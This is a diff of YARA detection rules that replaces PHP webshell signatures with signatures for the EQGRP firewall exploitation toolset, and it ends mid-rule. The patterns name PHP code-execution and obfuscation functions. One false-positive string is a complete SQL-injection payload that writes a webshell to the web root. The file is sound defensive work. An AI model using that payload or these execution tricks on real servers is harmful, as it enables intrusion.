+		author = "Florian Roth (Nextron Systems)"
+		id = "58b0b51d-d1f8-5ee2-a4af-491c49dd0573"
+		date = "2016-08-16"
+		modified = "2023-12-05"
+		reference = "Research"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_eqgrp.yar#L1137-L1168"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "0e21931b16f30b1db90a27eafabccc91abd757fa63594ba8a6ad3f477de1ab1c"
-		hash = "929975272f0f42bf76469ed89ebf37efcbd91c6f8dac1129c7ab061e2564dd06"
-		hash = "88fce6c1b589d600b4295528d3fcac161b581f739095b99cd6c768b7e16e89ff"
-		hash = "883f48ed4e9646da078cabf6b8b4946d9f199660262502650f76450ecf60ddd5"
-		hash = "50389c3b95a9de00220fc554258fda1fef01c62dad849e66c8a92fc749523457"
-		hash = "c4ab4319a77b751a45391aa01cde2d765b095b0e3f6a92b0b8626d5c7e3ad603"
-		hash = "df381f04fca2522e2ecba0f5de3f73a655d1540e1cf865970f5fa3bf52d2b297"
-		hash = "401388d8b97649672d101bf55694dd175375214386253d0b4b8d8d801a89549c"
-		hash = "99fc39a12856cc1a42bb7f90ffc9fe0a5339838b54a63e8f00aa98961c900618"
-		hash = "fb031af7aa459ee88a9ca44013a76f6278ad5846aa20e5add4aeb5fab058d0ee"
-		hash = "dd5d8a9b4bb406e0b8f868165a1714fe54ffb18e621582210f96f6e5ae850b33"
-		hash = "0ff05e6695074f98b0dee6200697a997c509a652f746d2c1c92c0b0a0552ca47"
-		logic_hash = "d9b4d224d43915cf08050c173627b314c3e41a30ecfffe28038281eadc114e51"
+		logic_hash = "c3cbe11ae38f5affffab247cdc618d0afb5a0feda6ea4b2f43dd8edb2fbf2b11"
 		score = 75
-		quality = 17
+		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		importance = 70
+		super_rule = 1
+		hash1 = "3366b4bbf265716869a487203a8ac39867920880990493dd4dd8385e42b0c119"
+		hash2 = "05031898f3d52a5e05de119868c0ec7caad3c9f3e9780e12f6f28b02941895a4"
+		hash3 = "d9756e3ba272cd4502d88f4520747e9e69d241dee6561f30423840123c1a7939"
+		hash4 = "8e4a76c4b50350b67cabbb2fed47d781ee52d8d21121647b0c0356498aeda2a2"
+		hash5 = "6059bec5cf297266079d52dbb29ab9b9e0b35ce43f718022b5b5f760c1976ec3"
+		hash6 = "464b4c01f93f31500d2d770360d23bdc37e5ad4885e274a629ea86b2accb7a5c"
 
 	strings:
-		$mix = /['"](\w|\\x?[0-9a-f]{2,3})[\\x0-9a-f]{2,20}\\\d{1,3}[\\x0-9a-f]{2,20}\\x[0-9a-f]{2}\\/ wide ascii nocase
-		$php_short = "<?" wide ascii
-		$no_xml1 = "<?xml version" nocase wide ascii
-		$no_xml2 = "<?xml-stylesheet" nocase wide ascii
-		$no_asp1 = "<%@LANGUAGE" nocase wide ascii
-		$no_asp2 = /<script language="(vb|jscript|c#)/ nocase wide ascii
-		$no_pdf = "<?xpacket"
-		$php_new1 = /<\?=[^?]/ wide ascii
-		$php_new2 = "<?php" nocase wide ascii
-		$php_new3 = "<script language=\"php" nocase wide ascii
+		$x1 = "Modules persistence file written successfully" fullword ascii
+		$x2 = "Modules persistence data successfully removed" fullword ascii
+		$x3 = "No Modules are active on the firewall, nothing to persist" fullword ascii
+		$s1 = "--cmd %x --idkey %s --sport %i --dport %i --lp %s --implant %s --bsize %hu --logdir %s " fullword ascii
+		$s2 = "Error while attemping to persist modules:" fullword ascii
+		$s3 = "Error while reading interface info from PIX" fullword ascii
+		$s4 = "LP.c:pixFree - Failed to get response" fullword ascii
+		$s5 = "WARNING: LP Timeout specified (%lu seconds) less than default (%u seconds).  Setting default" fullword ascii
+		$s6 = "Unable to fetch config address for this OS version" fullword ascii
+		$s7 = "LP.c: interface information not available for this session" fullword ascii
+		$s8 = "[%s:%s:%d] ERROR: " fullword ascii
+		$s9 = "extract_fgbg" fullword ascii
 
 	condition:
-		filesize < 700KB and ( ( ( $php_short in ( 0 .. 100 ) or $php_short in ( filesize -1000 .. filesize ) ) and not any of ( $no_* ) ) or any of ( $php_new* ) ) and any of ( $mix* )
+		( uint16( 0 ) == 0x457f and filesize < 3000KB and 1 of ( $x* ) ) or ( 5 of them )
 }
-rule SIGNATURE_BASE_WEBSHELL_PHP_OBFUSC_Tiny : FILE
+rule SIGNATURE_BASE_EQGRP_Implants_Gen1 : FILE
 {
 	meta:
-		description = "PHP webshell obfuscated"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "d78e495f-54d2-5f5f-920f-fb6612afbca3"
-		date = "2021-01-12"
-		modified = "2024-03-11"
-		reference = "Internal Research"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_webshells.yar#L1249-L1344"
+		description = "EQGRP Toolset Firewall"
+		author = "Florian Roth (Nextron Systems)"
+		id = "af0a1a2c-0efb-568f-9e80-baee7398fea2"
+		date = "2016-08-16"
+		modified = "2023-12-05"
+		reference = "Research"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_eqgrp.yar#L1170-L1199"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "b7b7aabd518a2f8578d4b1bc9a3af60d155972f1"
-		hash = "694ec6e1c4f34632a9bd7065f73be473"
-		hash = "5c871183444dbb5c8766df6b126bd80c624a63a16cc39e20a0f7b002216b2ba5"
-		logic_hash = "993f1c98362dcbc207c6ceacb116a27d44505dc6dfa1874def780af50422e1b9"
+		logic_hash = "1493f78e74503c367e3c5d8eac32167a7ad34d2435eba00e1f7bf864682e10a5"
 		score = 75
-		quality = -90
+		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		importance = 70
+		super_rule = 1
+		hash1 = "3366b4bbf265716869a487203a8ac39867920880990493dd4dd8385e42b0c119"
+		hash2 = "830538fe8c981ca386c6c7d55635ac61161b23e6e25d96280ac2fc638c2d82cc"
+		hash3 = "05031898f3d52a5e05de119868c0ec7caad3c9f3e9780e12f6f28b02941895a4"
+		hash4 = "d9756e3ba272cd4502d88f4520747e9e69d241dee6561f30423840123c1a7939"
+		hash5 = "8e4a76c4b50350b67cabbb2fed47d781ee52d8d21121647b0c0356498aeda2a2"
+		hash6 = "6059bec5cf297266079d52dbb29ab9b9e0b35ce43f718022b5b5f760c1976ec3"
+		hash7 = "d859ce034751cac960825268a157ced7c7001d553b03aec54e6794ff66185e6f"
+		hash8 = "ee3e3487a9582181892e27b4078c5a3cb47bb31fc607634468cc67753f7e61d7"
+		hash9 = "464b4c01f93f31500d2d770360d23bdc37e5ad4885e274a629ea86b2accb7a5c"
 
 	strings:
-		$obf1 = /\w'\.'\w/ wide ascii
-		$obf2 = /\w\"\.\"\w/ wide ascii
-		$obf3 = "].$" wide ascii
-		$gfp1 = "eval(\"return [$serialised_parameter"
-		$gfp2 = "$this->assert(strpos($styles, $"
-		$gfp3 = "$module = new $_GET['module']($_GET['scope']);"
-		$gfp4 = "$plugin->$_POST['action']($_POST['id']);"
-		$gfp5 = "$_POST[partition_by]($_POST["
-		$gfp6 = "$object = new $_REQUEST['type']($_REQUEST['id']);"
-		$gfp7 = "The above example code can be easily exploited by passing in a string such as"
-		$gfp8 = "Smarty_Internal_Debug::start_render($_template);"
-		$gfp9 = "?p4yl04d=UNION%20SELECT%20'<?%20system($_GET['command']);%20?>',2,3%20INTO%20OUTFILE%20'/var/www/w3bsh3ll.php"
-		$gfp10 = "[][}{;|]\\|\\\\[+=]\\|<?=>?"
-		$gfp11 = "(eval (getenv \"EPROLOG\")))"
-		$gfp12 = "ZmlsZV9nZXRfY29udGVudHMoJ2h0dHA6Ly9saWNlbnNlLm9wZW5jYXJ0LWFwaS5jb20vbGljZW5zZS5waHA/b3JkZXJ"
-		$php_short = "<?" wide ascii
-		$no_xml1 = "<?xml version" nocase wide ascii
-		$no_xml2 = "<?xml-stylesheet" nocase wide ascii
-		$no_asp1 = "<%@LANGUAGE" nocase wide ascii
-		$no_asp2 = /<script language="(vb|jscript|c#)/ nocase wide ascii
-		$no_pdf = "<?xpacket"
-		$php_new1 = /<\?=[^?]/ wide ascii
-		$php_new2 = "<?php" nocase wide ascii
-		$php_new3 = "<script language=\"php" nocase wide ascii
-		$cpayload1 = /\beval[\n\t ]{0,500}(\([^)]|\/\*)/ nocase wide ascii
-		$cpayload2 = /\bexec[\n\t ]{0,500}(\([^)]|\/\*)/ nocase wide ascii
-		$cpayload3 = /\bshell_exec[\n\t ]{0,500}(\([^)]|\/\*)/ nocase wide ascii
-		$cpayload4 = /\bpassthru[\n\t ]{0,500}(\([^)]|\/\*)/ nocase wide ascii
-		$cpayload5 = /\bsystem[\n\t ]{0,500}(\([^)]|\/\*)/ nocase wide ascii
-		$cpayload6 = /\bpopen[\n\t ]{0,500}(\([^)]|\/\*)/ nocase wide ascii
-		$cpayload7 = /\bproc_open[\n\t ]{0,500}(\([^)]|\/\*)/ nocase wide ascii
-		$cpayload8 = /\bpcntl_exec[\n\t ]{0,500}(\([^)]|\/\*)/ nocase wide ascii
-		$cpayload9 = /\bassert[\n\t ]{0,500}\([^)0]/ nocase wide ascii
-		$cpayload10 = /\bpreg_replace[\n\t ]{0,500}\([^\)]{1,100}\/[ismxADSUXju]{0,11}(e|\\x65)/ nocase wide ascii
-		$cpayload12 = /\bmb_ereg_replace[\t ]{0,500}\([^\)]{1,100}'e'/ nocase wide ascii
-		$cpayload13 = /\bmb_eregi_replace[\t ]{0,500}\([^\)]{1,100}'e'/ nocase wide ascii
-		$cpayload20 = /\bcreate_function[\n\t ]{0,500}(\([^)]|\/\*)/ nocase wide ascii
-		$cpayload21 = /\bReflectionFunction[\n\t ]{0,500}(\([^)]|\/\*)/ nocase wide ascii
-		$cpayload22 = /fetchall\(PDO::FETCH_FUNC[\n\t ]{0,500}[,}\)]/ nocase wide ascii
-		$m_cpayload_preg_filter1 = /\bpreg_filter[\n\t ]{0,500}(\([^\)]|\/\*)/ nocase wide ascii
-		$m_cpayload_preg_filter2 = "'|.*|e'" nocase wide ascii
+		$s1 = "WARNING:  Session may not have been closed!" fullword ascii
+		$s2 = "EXEC Packet Processed" fullword ascii
+		$s3 = "Failed to insert the command into command list." fullword ascii
+		$s4 = "Send_Packet: Trying to send too much data." fullword ascii
+		$s5 = "payloadLength >= MAX_ALLOW_SIZE." fullword ascii
+		$s6 = "Wrong Payload Size" fullword ascii
+		$s7 = "Unknown packet received......" fullword ascii
+		$s8 = "Returned eax = %08x" fullword ascii
 
 	condition:
-		filesize < 500 and not ( any of ( $gfp* ) ) and ( ( ( $php_short in ( 0 .. 100 ) or $php_short in ( filesize -1000 .. filesize ) ) and not any of ( $no_* ) ) or any of ( $php_new* ) ) and ( any of ( $cpayload* ) or all of ( $m_cpayload_preg_filter* ) ) and ( ( #obf1 + #obf2 ) > 2 or #obf3 > 10 )
+		( uint16( 0 ) == 0x457f and filesize < 6000KB and ( 2 of ( $s* ) ) ) or ( 5 of them )
 }
-rule SIGNATURE_BASE_WEBSHELL_PHP_OBFUSC_Str_Replace : FILE
+rule SIGNATURE_BASE_EQGRP_Eligiblebombshell_Generic : FILE
 {
 	meta:
-		description = "PHP webshell which eval()s obfuscated string"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "1f5b93c9-bdeb-52c7-a99a-69869634a574"
-		date = "2021-01-12"
-		modified = "2023-04-05"
-		reference = "Internal Research"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_webshells.yar#L1346-L1401"
+		description = "EQGRP Toolset Firewall - from files eligiblebombshell_1.2.0.1.py, eligiblebombshell_1.2.0.1.py"
+		author = "Florian Roth (Nextron Systems)"
+		id = "7abe53f6-9880-523a-b71f-6e3850047764"
+		date = "2016-08-16"
+		modified = "2023-12-05"
+		reference = "Research"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_eqgrp.yar#L1201-L1218"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "691305753e26884d0f930cda0fe5231c6437de94"
-		hash = "7efd463aeb5bf0120dc5f963b62463211bd9e678"
-		hash = "fb655ddb90892e522ae1aaaf6cd8bde27a7f49ef"
-		hash = "d1863aeca1a479462648d975773f795bb33a7af2"
-		hash = "4d31d94b88e2bbd255cf501e178944425d40ee97"
-		hash = "e1a2af3477d62a58f9e6431f5a4a123fb897ea80"
-		logic_hash = "74fb86a7ee7342ede9f49ef004a92fb7bdf06ca62f8e8f0ea1c6adcff96bcb2d"
+		logic_hash = "a2e13300736f99aff30c7b4f7f0b148d62ecb1e72435a3e15e4f85b30d904ffd"
 		score = 75
-		quality = 46
+		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		importance = 70
+		super_rule = 1
+		hash1 = "dd0e3ae6e1039a755bf6cb28bf726b4d6ab4a1da2392ba66d114a43a55491eb1"
+		hash2 = "dd0e3ae6e1039a755bf6cb28bf726b4d6ab4a1da2392ba66d114a43a55491eb1"
 
 	strings:
-		$payload1 = "str_replace" fullword wide ascii
-		$payload2 = "function" fullword wide ascii
-		$goto = "goto" fullword wide ascii
-		$chr1 = "\\61" wide ascii
-		$chr2 = "\\112" wide ascii
-		$chr3 = "\\120" wide ascii
-		$php_short = "<?" wide ascii
-		$no_xml1 = "<?xml version" nocase wide ascii
-		$no_xml2 = "<?xml-stylesheet" nocase wide ascii
-		$no_asp1 = "<%@LANGUAGE" nocase wide ascii
-		$no_asp2 = /<script language="(vb|jscript|c#)/ nocase wide ascii
-		$no_pdf = "<?xpacket"
-		$php_new1 = /<\?=[^?]/ wide ascii
-		$php_new2 = "<?php" nocase wide ascii
-		$php_new3 = "<script language=\"php" nocase wide ascii
+		$s1 = "logging.error(\"       Perhaps you should run with --scan?\")" fullword ascii
+		$s2 = "logging.error(\"ERROR: No entry for ETag [%s] in %s.\" %" fullword ascii
+		$s3 = "\"be supplied\")" fullword ascii
 
 	condition:
-		filesize < 300KB and ( ( ( $php_short in ( 0 .. 100 ) or $php_short in ( filesize -1000 .. filesize ) ) and not any of ( $no_* ) ) or any of ( $php_new* ) ) and any of ( $payload* ) and #goto > 1 and ( #chr1 > 10 or #chr2 > 10 or #chr3 > 10 )
+		( filesize < 70KB and 2 of ( $s* ) ) or ( all of them )
 }
-rule SIGNATURE_BASE_WEBSHELL_PHP_OBFUSC_Fopo : FILE
+rule SIGNATURE_BASE_EQGRP_Ssh_Telnet_29 : FILE
 {
 	meta:
-		description = "PHP webshell which eval()s obfuscated string"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "a298e99d-1ba8-58c8-afb9-fc988ea91e9a"
-		date = "2021-01-12"
-		modified = "2023-04-05"
-		reference = "Internal Research"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_webshells.yar#L1403-L1463"
+		description = "EQGRP Toolset Firewall - from files ssh.py, telnet.py"
+		author = "Florian Roth (Nextron Systems)"
+		id = "cc6edf63-f7ef-579a-82c5-28e5012561e0"
+		date = "2016-08-16"
+		modified = "2023-12-05"
+		reference = "Research"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_eqgrp.yar#L1220-L1241"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "fbcff8ea5ce04fc91c05384e847f2c316e013207"
-		hash = "6da57ad8be1c587bb5cc8a1413f07d10fb314b72"
-		hash = "a698441f817a9a72908a0d93a34133469f33a7b34972af3e351bdccae0737d99"
-		logic_hash = "076c0c256e5951cdcb2b7bc55030f55bec48c1bea953b8bd85559a3230e387ae"
+		logic_hash = "e93a54f4de089d460bfb966feacc377c0467863f481a210c81970f4909fb3bd8"
 		score = 75
-		quality = 40
+		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		importance = 70
+		super_rule = 1
+		hash1 = "630d464b1d08c4dfd0bd50552bee2d6a591fb0b5597ecebaa556a3c3d4e0aa4e"
+		hash2 = "07f4c60505f4d5fb5c4a76a8c899d9b63291444a3980d94c06e1d5889ae85482"
 
 	strings:
-		$payload = /(\beval[\t ]{0,500}\([^)]|\bassert[\t ]{0,500}\([^)])/ nocase wide ascii
-		$one1 = "7QGV2YWwo" wide ascii
-		$one2 = "tAZXZhbC" wide ascii
-		$one3 = "O0BldmFsK" wide ascii
-		$one4 = "sAQABlAHYAYQBsACgA" wide ascii
-		$one5 = "7AEAAZQB2AGEAbAAoA" wide ascii
-		$one6 = "OwBAAGUAdgBhAGwAKA" wide ascii
-		$two1 = "7QGFzc2VydC" wide ascii
-		$two2 = "tAYXNzZXJ0K" wide ascii
-		$two3 = "O0Bhc3NlcnQo" wide ascii
-		$two4 = "sAQABhAHMAcwBlAHIAdAAoA" wide ascii
-		$two5 = "7AEAAYQBzAHMAZQByAHQAKA" wide ascii
-		$two6 = "OwBAAGEAcwBzAGUAcgB0ACgA" wide ascii
-		$php_short = "<?" wide ascii
-		$no_xml1 = "<?xml version" nocase wide ascii
-		$no_xml2 = "<?xml-stylesheet" nocase wide ascii
-		$no_asp1 = "<%@LANGUAGE" nocase wide ascii
-		$no_asp2 = /<script language="(vb|jscript|c#)/ nocase wide ascii
-		$no_pdf = "<?xpacket"
-		$php_new1 = /<\?=[^?]/ wide ascii
-		$php_new2 = "<?php" nocase wide ascii
-		$php_new3 = "<script language=\"php" nocase wide ascii
+		$s1 = "received prompt, we're in" fullword ascii
+		$s2 = "failed to login, bad creds, abort" fullword ascii
+		$s3 = "sending command \" + str(n) + \"/\" + str(tot) + \", len \" + str(len(chunk) + " fullword ascii
+		$s4 = "received nat - EPBA: ok, payload: mangled, did not run" fullword ascii
+		$s5 = "no status returned from target, could be an exploit failure, or this is a version where we don't expect a stus return" ascii
+		$s6 = "received arp - EPBA: ok, payload: fail" fullword ascii
+		$s7 = "chopped = string.rstrip(payload, \"\\x0a\")" fullword ascii
 
 	condition:
-		filesize < 3000KB and ( ( ( $php_short in ( 0 .. 100 ) or $php_short in ( filesize -1000 .. filesize ) ) and not any of ( $no_* ) ) or any of ( $php_new* ) ) and $payload and ( any of ( $one* ) or any of ( $two* ) )
+		( filesize < 10KB and 2 of them ) or ( 3 of them )
 }
-rule SIGNATURE_BASE_WEBSHELL_PHP_Gzinflated : FILE
+rule SIGNATURE_BASE_EQGRP_Tinyexec : FILE
 {
 	meta:
-		description = "PHP webshell which directly eval()s obfuscated string"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "9cf99ae4-9f7c-502f-9294-b531002953d6"
-		date = "2021-01-12"
-		modified = "2023-07-05"
-		reference = "Internal Research"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_webshells.yar#L1465-L1538"
+		description = "EQGRP Toolset Firewall - from files tinyexec"
+		author = "Florian Roth (Nextron Systems)"
+		id = "b783bafd-52e2-59e8-98ab-47de3250415e"
+		date = "2016-08-16"
+		modified = "2023-12-05"
+		reference = "Research"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_eqgrp.yar#L1245-L1258"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "49e5bc75a1ec36beeff4fbaeb16b322b08cf192d"
-		hash = "6f36d201cd32296bad9d5864c7357e8634f365cc"
-		hash = "ab10a1e69f3dfe7c2ad12b2e6c0e66db819c2301"
-		hash = "a6cf337fe11fe646d7eee3d3f09c7cb9643d921d"
-		hash = "07eb6634f28549ebf26583e8b154c6a579b8a733"
-		logic_hash = "d2edb7050c986a00889fd01b709ec0aa1409ce2e40a15b7942562d12596b190e"
+		logic_hash = "19b8d7e946d72424f81cd48ad4bf8791bf50a4cc146866e55ad501443a8d1e45"
 		score = 75
-		quality = 32
+		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		importance = 70
 
 	strings:
-		$payload2 = /eval\s?\(\s?("\?>".)?gzinflate\s?\(\s?base64_decode\s?\(/ wide ascii nocase
-		$payload4 = /eval\s?\(\s?("\?>".)?gzuncompress\s?\(\s?(base64_decode|gzuncompress)/ wide ascii nocase
-		$payload6 = /eval\s?\(\s?("\?>".)?gzdecode\s?\(\s?base64_decode\s?\(/ wide ascii nocase
-		$payload7 = /eval\s?\(\s?base64_decode\s?\(/ wide ascii nocase
-		$payload8 = /eval\s?\(\s?pack\s?\(/ wide ascii nocase
-		$fp1 = "YXBpLnRlbGVncmFtLm9"
-		$gfp1 = "eval(\"return [$serialised_parameter"
-		$gfp2 = "$this->assert(strpos($styles, $"
-		$gfp3 = "$module = new $_GET['module']($_GET['scope']);"
-		$gfp4 = "$plugin->$_POST['action']($_POST['id']);"
-		$gfp5 = "$_POST[partition_by]($_POST["
-		$gfp6 = "$object = new $_REQUEST['type']($_REQUEST['id']);"
-		$gfp7 = "The above example code can be easily exploited by passing in a string such as"
-		$gfp8 = "Smarty_Internal_Debug::start_render($_template);"
-		$gfp9 = "?p4yl04d=UNION%20SELECT%20'<?%20system($_GET['command']);%20?>',2,3%20INTO%20OUTFILE%20'/var/www/w3bsh3ll.php"
-		$gfp10 = "[][}{;|]\\|\\\\[+=]\\|<?=>?"
-		$gfp11 = "(eval (getenv \"EPROLOG\")))"
-		$gfp12 = "ZmlsZV9nZXRfY29udGVudHMoJ2h0dHA6Ly9saWNlbnNlLm9wZW5jYXJ0LWFwaS5jb20vbGljZW5zZS5waHA/b3JkZXJ"
-		$php_short = "<?" wide ascii
-		$no_xml1 = "<?xml version" nocase wide ascii
-		$no_xml2 = "<?xml-stylesheet" nocase wide ascii
-		$no_asp1 = "<%@LANGUAGE" nocase wide ascii
-		$no_asp2 = /<script language="(vb|jscript|c#)/ nocase wide ascii
-		$no_pdf = "<?xpacket"
-		$php_new1 = /<\?=[^?]/ wide ascii
-		$php_new2 = "<?php" nocase wide ascii
-		$php_new3 = "<script language=\"php" nocase wide ascii
+		$s1 = { 73 68 73 74 72 74 61 62 00 2E 74 65 78 74 }
+		$s2 = { 5A 58 55 52 89 E2 55 50 89 E1 }
 
 	condition:
-		filesize < 700KB and not ( any of ( $gfp* ) ) and ( ( ( $php_short in ( 0 .. 100 ) or $php_short in ( filesize -1000 .. filesize ) ) and not any of ( $no_* ) ) or any of ( $php_new* ) ) and 1 of ( $payload* ) and not any of ( $fp* )
+		uint32( 0 ) == 0x464c457f and filesize < 270 and all of them
 }
-rule SIGNATURE_BASE_WEBSHELL_PHP_OBFUSC_3 : FILE
+rule SIGNATURE_BASE_EQGRP_Callbacks
 {
 	meta:
-		description = "PHP webshell which eval()s obfuscated string"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "f2017e6f-0623-53ff-aa26-a479f3a02024"
-		date = "2021-04-17"
-		modified = "2024-12-09"
-		reference = "Internal Research"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_webshells.yar#L1540-L1846"
+		description = "EQGRP Toolset Firewall - Callback addresses"
+		author = "Florian Roth (Nextron Systems)"
+		id = "dd1fbe09-4def-562d-825d-e790dc2c3dd9"
+		date = "2016-08-16"
+		modified = "2023-12-05"
+		reference = "Research"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_eqgrp.yar#L1260-L1272"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "11bb1fa3478ec16c00da2a1531906c05e9c982ea"
-		hash = "d6b851cae249ea6744078393f622ace15f9880bc"
-		hash = "14e02b61905cf373ba9234a13958310652a91ece"
-		hash = "6f97f607a3db798128288e32de851c6f56e91c1d"
-		logic_hash = "aba86f6d8458bb119b9e495e6e77c1b89855bde31b12395a4d656878c5152932"
-		score = 70
-		quality = -198
-		tags = "FILE"
+		logic_hash = "34881cf8f9f29482a1e129f0f61470d4cc3fa6b78b9f6dda25862371896deca7"
+		score = 75
+		quality = 85
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		importance = 70
 
 	strings:
-		$obf1 = "chr(" wide ascii
-		$php_short = "<?" wide ascii
-		$no_xml1 = "<?xml version" nocase wide ascii
-		$no_xml2 = "<?xml-stylesheet" nocase wide ascii
-		$no_asp1 = "<%@LANGUAGE" nocase wide ascii
-		$no_asp2 = /<script language="(vb|jscript|c#)/ nocase wide ascii
-		$no_pdf = "<?xpacket"
-		$php_new1 = /<\?=[^?]/ wide ascii
-		$php_new2 = "<?php" nocase wide ascii
-		$php_new3 = "<script language=\"php" nocase wide ascii
-		$callback1 = /\bob_start[\n\t ]{0,500}(\([^)]|\/\*)/ nocase wide ascii
-		$callback2 = /\barray_diff_uassoc[\n\t ]{0,500}(\([^)]|\/\*)/ nocase wide ascii
-		$callback3 = /\barray_diff_ukey[\n\t ]{0,500}(\([^)]|\/\*)/ nocase wide ascii
-		$callback4 = /\barray_filter[\n\t ]{0,500}(\([^)]|\/\*)/ nocase wide ascii
-		$callback5 = /\barray_intersect_uassoc[\n\t ]{0,500}(\([^)]|\/\*)/ nocase wide ascii
-		$callback6 = /\barray_intersect_ukey[\n\t ]{0,500}(\([^)]|\/\*)/ nocase wide ascii
-		$callback7 = /\barray_map[\n\t ]{0,500}(\([^)]|\/\*)/ nocase wide ascii
-		$callback8 = /\barray_reduce[\n\t ]{0,500}(\([^)]|\/\*)/ nocase wide ascii
-		$callback9 = /\barray_udiff_assoc[\n\t ]{0,500}(\([^)]|\/\*)/ nocase wide ascii
-		$callback10 = /\barray_udiff_uassoc[\n\t ]{0,500}(\([^)]|\/\*)/ nocase wide ascii
-		$callback11 = /\barray_udiff[\n\t ]{0,500}(\([^)]|\/\*)/ nocase wide ascii
-		$callback12 = /\barray_uintersect_assoc[\n\t ]{0,500}(\([^)]|\/\*)/ nocase wide ascii
-		$callback13 = /\barray_uintersect_uassoc[\n\t ]{0,500}(\([^)]|\/\*)/ nocase wide ascii
-		$callback14 = /\barray_uintersect[\n\t ]{0,500}(\([^)]|\/\*)/ nocase wide ascii
-		$callback15 = /\barray_walk_recursive[\n\t ]{0,500}(\([^)]|\/\*)/ nocase wide ascii
-		$callback16 = /\barray_walk[\n\t ]{0,500}(\([^)]|\/\*)/ nocase wide ascii
-		$callback17 = /\bassert_options[\n\t ]{0,500}(\([^)]|\/\*)/ nocase wide ascii
-		$callback18 = /\buasort[\n\t ]{0,500}(\([^)]|\/\*)/ nocase wide ascii
-		$callback19 = /\buksort[\n\t ]{0,500}(\([^)]|\/\*)/ nocase wide ascii
-		$callback20 = /\busort[\n\t ]{0,500}(\([^)]|\/\*)/ nocase wide ascii
-		$callback21 = /\bpreg_replace_callback[\n\t ]{0,500}(\([^)]|\/\*)/ nocase wide ascii
-		$callback22 = /\bspl_autoload_register[\n\t ]{0,500}(\([^)]|\/\*)/ nocase wide ascii
-		$callback23 = /\biterator_apply[\n\t ]{0,500}(\([^)]|\/\*)/ nocase wide ascii
-		$callback24 = /\bcall_user_func[\n\t ]{0,500}(\([^)]|\/\*)/ nocase wide ascii
-		$callback25 = /\bcall_user_func_array[\n\t ]{0,500}(\([^)]|\/\*)/ nocase wide ascii
-		$callback26 = /\bregister_shutdown_function[\n\t ]{0,500}(\([^)]|\/\*)/ nocase wide ascii
-		$callback27 = /\bregister_tick_function[\n\t ]{0,500}(\([^)]|\/\*)/ nocase wide ascii
-		$callback28 = /\bset_error_handler[\n\t ]{0,500}(\([^)]|\/\*)/ nocase wide ascii
-		$callback29 = /\bset_exception_handler[\n\t ]{0,500}(\([^)]|\/\*)/ nocase wide ascii
-		$callback30 = /\bsession_set_save_handler[\n\t ]{0,500}(\([^)]|\/\*)/ nocase wide ascii
-		$callback31 = /\bsqlite_create_aggregate[\n\t ]{0,500}(\([^)]|\/\*)/ nocase wide ascii
-		$callback32 = /\bsqlite_create_function[\n\t ]{0,500}(\([^)]|\/\*)/ nocase wide ascii
-		$callback33 = /\bmb_ereg_replace_callback[\n\t ]{0,500}(\([^)]|\/\*)/ nocase wide ascii
-		$m_callback1 = /\bfilter_var[\n\t ]{0,500}(\([^)]|\/\*)/ nocase wide ascii
-		$m_callback2 = "FILTER_CALLBACK" fullword wide ascii
-		$cfp1 = /ob_start\(['\"]ob_gzhandler/ nocase wide ascii
-		$cfp2 = "IWPML_Backend_Action_Loader" ascii wide
-		$cfp3 = "<?phpclass WPML" ascii
-		$cfp4 = "      return implode('', "
-		$cpayload1 = /\beval[\n\t ]{0,500}(\([^)]|\/\*)/ nocase wide ascii
-		$cpayload2 = /\bexec[\n\t ]{0,500}(\([^)]|\/\*)/ nocase wide ascii
-		$cpayload3 = /\bshell_exec[\n\t ]{0,500}(\([^)]|\/\*)/ nocase wide ascii
-		$cpayload4 = /\bpassthru[\n\t ]{0,500}(\([^)]|\/\*)/ nocase wide ascii
